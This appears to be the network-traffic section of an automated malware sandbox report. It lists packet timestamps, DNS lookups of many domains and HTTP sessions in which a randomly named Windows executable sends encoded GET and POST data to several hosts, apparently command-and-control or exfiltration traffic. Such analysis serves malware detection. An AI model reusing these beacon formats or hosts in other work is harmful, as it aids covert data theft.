                Jul 3, 2024 08:55:01.102874994 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:01.105330944 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:01.110179901 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.441793919 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.441912889 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.441926003 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.441955090 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.442409992 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.442423105 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.442457914 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.443182945 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.443196058 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.443223000 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.443970919 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.443984032 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.443994999 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.444003105 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.444032907 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.448005915 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.448019028 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.448064089 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.448930025 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.499167919 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.539419889 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.539616108 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.539628029 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.539659023 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.540122032 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.540163040 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.544255018 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.544447899 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.544460058 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.544506073 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.545157909 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.545196056 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.549230099 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.549242973 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.549282074 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.549602032 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.549990892 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.550004005 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.550033092 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.554119110 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.554132938 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.554157972 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.554801941 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.554815054 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.554825068 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.554838896 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.554868937 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.558886051 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.558898926 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.558909893 CEST8049732109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:02.558937073 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.558957100 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:02.608930111 CEST4973280192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:03.628151894 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:03.633619070 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:03.633899927 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:03.635739088 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:03.640877962 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:03.641217947 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.044754982 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.044891119 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.044903040 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.044951916 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.045370102 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.045382023 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.045492887 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.046114922 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.046128035 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.046180010 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.046879053 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.046891928 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.046902895 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.046926022 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.047102928 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.049922943 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.050162077 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.050174952 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.050242901 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.050667048 CEST8049733109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:05.050721884 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:05.140340090 CEST4973380192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:06.158665895 CEST4973480192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:06.163635969 CEST8049734109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:06.164263010 CEST4973480192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:06.168627024 CEST4973480192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:06.173543930 CEST8049734109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:07.859935045 CEST8049734109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:07.860033035 CEST8049734109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:07.860132933 CEST4973480192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:07.862792969 CEST4973480192.168.2.9109.95.158.122
                Jul 3, 2024 08:55:07.867679119 CEST8049734109.95.158.122192.168.2.9
                Jul 3, 2024 08:55:12.903616905 CEST4973580192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:12.908576965 CEST8049735203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:12.908653021 CEST4973580192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:12.911125898 CEST4973580192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:12.916718006 CEST8049735203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:13.515974045 CEST8049735203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:13.516005993 CEST8049735203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:13.516113043 CEST4973580192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:14.421677113 CEST4973580192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:15.441687107 CEST4973680192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:15.448287010 CEST8049736203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:15.449817896 CEST4973680192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:15.453695059 CEST4973680192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:15.460748911 CEST8049736203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:16.074518919 CEST8049736203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:16.074623108 CEST8049736203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:16.074688911 CEST4973680192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:16.952545881 CEST4973680192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:17.970822096 CEST4973780192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:17.975766897 CEST8049737203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:17.977804899 CEST4973780192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:17.981709957 CEST4973780192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:17.987046957 CEST8049737203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:17.987061977 CEST8049737203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:18.664436102 CEST8049737203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:18.664473057 CEST8049737203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:18.664516926 CEST4973780192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:19.485809088 CEST4973780192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:20.502516031 CEST4973880192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:20.730696917 CEST8049738203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:20.730782032 CEST4973880192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:20.732692957 CEST4973880192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:20.737483025 CEST8049738203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:21.331608057 CEST8049738203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:21.331629038 CEST8049738203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:21.331778049 CEST4973880192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:21.334331036 CEST4973880192.168.2.9203.161.49.220
                Jul 3, 2024 08:55:21.340359926 CEST8049738203.161.49.220192.168.2.9
                Jul 3, 2024 08:55:26.545770884 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:26.550607920 CEST804973935.227.248.111192.168.2.9
                Jul 3, 2024 08:55:26.550811052 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:26.552686930 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:26.557495117 CEST804973935.227.248.111192.168.2.9
                Jul 3, 2024 08:55:27.206048012 CEST804973935.227.248.111192.168.2.9
                Jul 3, 2024 08:55:27.208880901 CEST804973935.227.248.111192.168.2.9
                Jul 3, 2024 08:55:27.209084034 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:27.209139109 CEST804973935.227.248.111192.168.2.9
                Jul 3, 2024 08:55:27.209260941 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:28.062115908 CEST4973980192.168.2.935.227.248.111
                Jul 3, 2024 08:55:29.081705093 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:29.086579084 CEST804974035.227.248.111192.168.2.9
                Jul 3, 2024 08:55:29.089838028 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:29.093708992 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:29.098515987 CEST804974035.227.248.111192.168.2.9
                Jul 3, 2024 08:55:29.742577076 CEST804974035.227.248.111192.168.2.9
                Jul 3, 2024 08:55:29.745209932 CEST804974035.227.248.111192.168.2.9
                Jul 3, 2024 08:55:29.745255947 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:29.745320082 CEST804974035.227.248.111192.168.2.9
                Jul 3, 2024 08:55:29.745361090 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:30.595760107 CEST4974080192.168.2.935.227.248.111
                Jul 3, 2024 08:55:31.612201929 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:31.617845058 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:31.617922068 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:31.620143890 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:31.625072002 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:31.625319958 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:32.248908043 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:32.254739046 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:32.254761934 CEST804974135.227.248.111192.168.2.9
                Jul 3, 2024 08:55:32.254793882 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:32.254853010 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:33.124526978 CEST4974180192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.143008947 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.148727894 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.148799896 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.151087999 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.156052113 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.788007021 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.801292896 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.801425934 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.801470995 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.801484108 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.801553011 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.802160978 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.802171946 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.802181005 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:34.802468061 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.806824923 CEST4974280192.168.2.935.227.248.111
                Jul 3, 2024 08:55:34.812150955 CEST804974235.227.248.111192.168.2.9
                Jul 3, 2024 08:55:40.014554024 CEST4974380192.168.2.991.195.240.19
                Jul 3, 2024 08:55:40.019403934 CEST804974391.195.240.19192.168.2.9
                Jul 3, 2024 08:55:40.019493103 CEST4974380192.168.2.991.195.240.19
                Jul 3, 2024 08:55:40.021502972 CEST4974380192.168.2.991.195.240.19
                Jul 3, 2024 08:55:40.026323080 CEST804974391.195.240.19192.168.2.9
                Jul 3, 2024 08:55:40.660558939 CEST804974391.195.240.19192.168.2.9
                Jul 3, 2024 08:55:40.660579920 CEST804974391.195.240.19192.168.2.9
                Jul 3, 2024 08:55:40.660676956 CEST4974380192.168.2.991.195.240.19
                Jul 3, 2024 08:55:41.530590057 CEST4974380192.168.2.991.195.240.19
                Jul 3, 2024 08:55:42.549168110 CEST4974480192.168.2.991.195.240.19
                Jul 3, 2024 08:55:42.554099083 CEST804974491.195.240.19192.168.2.9
                Jul 3, 2024 08:55:42.555972099 CEST4974480192.168.2.991.195.240.19
                Jul 3, 2024 08:55:42.559837103 CEST4974480192.168.2.991.195.240.19
                Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                Jul 3, 2024 08:53:24.588613033 CEST | 192.168.2.9 | 1.1.1.1 | 0x25c7 | Standard query (0) | www.highwavesmarine.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:53:40.470069885 CEST | 192.168.2.9 | 1.1.1.1 | 0x41a7 | Standard query (0) | www.dxgsf.shop | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:53:54.330598116 CEST | 192.168.2.9 | 1.1.1.1 | 0xc296 | Standard query (0) | www.dennisrosenberg.studio | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:07.674539089 CEST | 192.168.2.9 | 1.1.1.1 | 0xf224 | Standard query (0) | www.shoplifestylebrand.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:15.752763987 CEST | 192.168.2.9 | 1.1.1.1 | 0x30bc | Standard query (0) | www.ennerdaledevcons.co.uk | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:29.049520969 CEST | 192.168.2.9 | 1.1.1.1 | 0x5947 | Standard query (0) | www.neworldelectronic.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:37.113199949 CEST | 192.168.2.9 | 1.1.1.1 | 0x3b8 | Standard query (0) | www.artemhypnotherapy.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:50.424416065 CEST | 192.168.2.9 | 1.1.1.1 | 0x34f0 | Standard query (0) | www.todosneaker.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:58.516880989 CEST | 192.168.2.9 | 1.1.1.1 | 0x35dc | Standard query (0) | www.mocar.pro | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:12.881217003 CEST | 192.168.2.9 | 1.1.1.1 | 0x60ce | Standard query (0) | www.evertudy.xyz | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:26.346579075 CEST | 192.168.2.9 | 1.1.1.1 | 0xe524 | Standard query (0) | www.luo918.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:39.819431067 CEST | 192.168.2.9 | 1.1.1.1 | 0xd49 | Standard query (0) | www.fungusbus.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:53.425735950 CEST | 192.168.2.9 | 1.1.1.1 | 0x1db0 | Standard query (0) | www.newzionocala.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:01.503779888 CEST | 192.168.2.9 | 1.1.1.1 | 0x1da8 | Standard query (0) | www.qe1jqiste.sbs | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:15.770952940 CEST | 192.168.2.9 | 1.1.1.1 | 0x9f17 | Standard query (0) | www.thesprinklesontop.com | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:33.145759106 CEST | 192.168.2.9 | 1.1.1.1 | 0x2fa8 | Standard query (0) | www.stefanogaus.com | A (IP address) | IN (0x0001) | false
                Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                Jul 3, 2024 08:53:24.831929922 CEST | 1.1.1.1 | 192.168.2.9 | 0x25c7 | No error (0) | www.highwavesmarine.com |  | 23.111.180.146 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:53:40.481149912 CEST | 1.1.1.1 | 192.168.2.9 | 0x41a7 | No error (0) | www.dxgsf.shop | dxgsf.shop |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:53:40.481149912 CEST | 1.1.1.1 | 192.168.2.9 | 0x41a7 | No error (0) | dxgsf.shop |  | 103.197.25.241 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:53:54.371467113 CEST | 1.1.1.1 | 192.168.2.9 | 0xc296 | No error (0) | www.dennisrosenberg.studio | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:53:54.371467113 CEST | 1.1.1.1 | 192.168.2.9 | 0xc296 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:07.688396931 CEST | 1.1.1.1 | 192.168.2.9 | 0xf224 | Name error (3) | www.shoplifestylebrand.com | none | none | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:15.763453007 CEST | 1.1.1.1 | 192.168.2.9 | 0x30bc | No error (0) | www.ennerdaledevcons.co.uk |  | 212.227.172.254 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:29.059401035 CEST | 1.1.1.1 | 192.168.2.9 | 0x5947 | Name error (3) | www.neworldelectronic.com | none | none | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:37.142033100 CEST | 1.1.1.1 | 192.168.2.9 | 0x3b8 | No error (0) | www.artemhypnotherapy.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:54:37.142033100 CEST | 1.1.1.1 | 192.168.2.9 | 0x3b8 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:50.440752029 CEST | 1.1.1.1 | 192.168.2.9 | 0x34f0 | Name error (3) | www.todosneaker.com | none | none | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:54:58.524456978 CEST | 1.1.1.1 | 192.168.2.9 | 0x35dc | No error (0) | www.mocar.pro | mocar.pro |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:54:58.524456978 CEST | 1.1.1.1 | 192.168.2.9 | 0x35dc | No error (0) | mocar.pro |  | 109.95.158.122 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:12.900590897 CEST | 1.1.1.1 | 192.168.2.9 | 0x60ce | No error (0) | www.evertudy.xyz |  | 203.161.49.220 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:26.540350914 CEST | 1.1.1.1 | 192.168.2.9 | 0xe524 | No error (0) | www.luo918.com |  | 35.227.248.111 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:40.012322903 CEST | 1.1.1.1 | 192.168.2.9 | 0xd49 | No error (0) | www.fungusbus.com | parkingpage.namecheap.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:55:40.012322903 CEST | 1.1.1.1 | 192.168.2.9 | 0xd49 | No error (0) | parkingpage.namecheap.com |  | 91.195.240.19 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:55:53.435292959 CEST | 1.1.1.1 | 192.168.2.9 | 0x1db0 | Name error (3) | www.newzionocala.com | none | none | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:02.082993031 CEST | 1.1.1.1 | 192.168.2.9 | 0x1da8 | No error (0) | www.qe1jqiste.sbs | xiaoyue.zhuangkou.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:56:02.082993031 CEST | 1.1.1.1 | 192.168.2.9 | 0x1da8 | No error (0) | xiaoyue.zhuangkou.com |  | 47.239.13.172 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:16.012361050 CEST | 1.1.1.1 | 192.168.2.9 | 0x9f17 | No error (0) | www.thesprinklesontop.com |  | 208.91.197.27 | A (IP address) | IN (0x0001) | false
                Jul 3, 2024 08:56:33.457642078 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fa8 | No error (0) | www.stefanogaus.com | stefanogaus.com |  | CNAME (Canonical name) | IN (0x0001) | false
                Jul 3, 2024 08:56:33.457642078 CEST | 1.1.1.1 | 192.168.2.9 | 0x2fa8 | No error (0) | stefanogaus.com |  | 66.235.200.146 | A (IP address) | IN (0x0001) | false
                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                0 | 192.168.2.9 | 49713 | 23.111.180.146 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:24.844984055 CEST | 477 | OUT | GET /vpfr/?4Z=FRPPB0TP0VK82R4&hH=YJOYlkuNdHbUbxIU0duDsGwGBWmXVvvP+a5ZIsJaJ66fRzvfH4BZf/UT7tP0StNW9dLVB8Be+XMnEr4f4IOQu0h2rMKukEsZCuMbbpIHNAKNxYQHAA== HTTP/1.1
                Host: www.highwavesmarine.com
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Connection: close
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Jul 3, 2024 08:53:25.374732018 CEST | 193 | IN | HTTP/1.1 404 Not Found
                Date: Wed, 03 Jul 2024 06:53:25 GMT
                Server: Apache
                Connection: close
                Transfer-Encoding: chunked
                Content-Type: text/html; charset=UTF-8
                Data Raw: 31 30 0d 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 0d 0a 30 0d 0a 0d 0a
                Data Ascii: 10File not found.0


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                1 | 192.168.2.9 | 49714 | 103.197.25.241 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:40.500763893 CEST | 722 | OUT | POST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 191
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
                Data Raw: 68 48 3d 43 68 47 74 5a 36 31 72 50 4e 67 64 52 4c 63 4d 50 54 47 42 7a 6e 54 31 69 78 6e 6e 37 54 56 41 72 49 46 41 4c 69 6e 66 56 53 52 71 79 45 72 41 67 5a 51 49 35 78 4e 30 52 46 53 77 52 70 4b 48 5a 2f 46 42 39 2f 42 49 48 6d 65 6a 72 58 30 77 4d 35 52 73 35 52 31 63 67 4e 37 70 72 71 74 69 7a 2b 6d 6b 62 74 54 50 75 4a 50 51 73 75 79 4a 67 30 34 52 34 78 43 50 35 62 4f 70 65 74 46 36 34 6b 37 47 72 42 47 33 6d 65 37 61 58 65 48 52 50 44 4e 77 59 73 48 33 39 6b 61 4c 6f 39 76 6a 36 51 6a 4b 42 45 6a 36 4c 66 48 78 54 76 4b 48 6a 4e 2f 42 6e 33 54 5a 53 2f 6e 38
                Data Ascii: hH=ChGtZ61rPNgdRLcMPTGBznT1ixnn7TVArIFALinfVSRqyErAgZQI5xN0RFSwRpKHZ/FB9/BIHmejrX0wM5Rs5R1cgN7prqtiz+mkbtTPuJPQsuyJg04R4xCP5bOpetF64k7GrBG3me7aXeHRPDNwYsH39kaLo9vj6QjKBEj6LfHxTvKHjN/Bn3TZS/n8
                Jul 3, 2024 08:53:41.404473066 CEST | 289 | IN | HTTP/1.1 404 Not Found
                Server: nginx
                Date: Wed, 03 Jul 2024 06:53:41 GMT
                Content-Type: text/html
                Content-Length: 146
                Connection: close
                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                2 | 192.168.2.9 | 49715 | 103.197.25.241 | 80 | 1356 | C:\Program Files (x86)\CCqhYYCDZzKlgSkuCJFeqRaoGoJFkRqcjXzJOiRAGeWFetixNxtbyCgMLQZZqUCo\owYCvHvzfwuh.exe
                Timestamp | Bytes transferred | Direction | Data
                Jul 3, 2024 08:53:43.084183931 CEST | 746 | OUT | POST /vfca/ HTTP/1.1
                Host: www.dxgsf.shop
                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                Accept-Language: en-US,en;q=0.9
                Accept-Encoding: gzip, deflate, br
                Connection: close
                Cache-Control: max-age=0
                Content-Length: 215
                Content-Type: application/x-www-form-urlencoded
                Origin: http://www.dxgsf.shop
                Referer: http://www.dxgsf.shop/vfca/
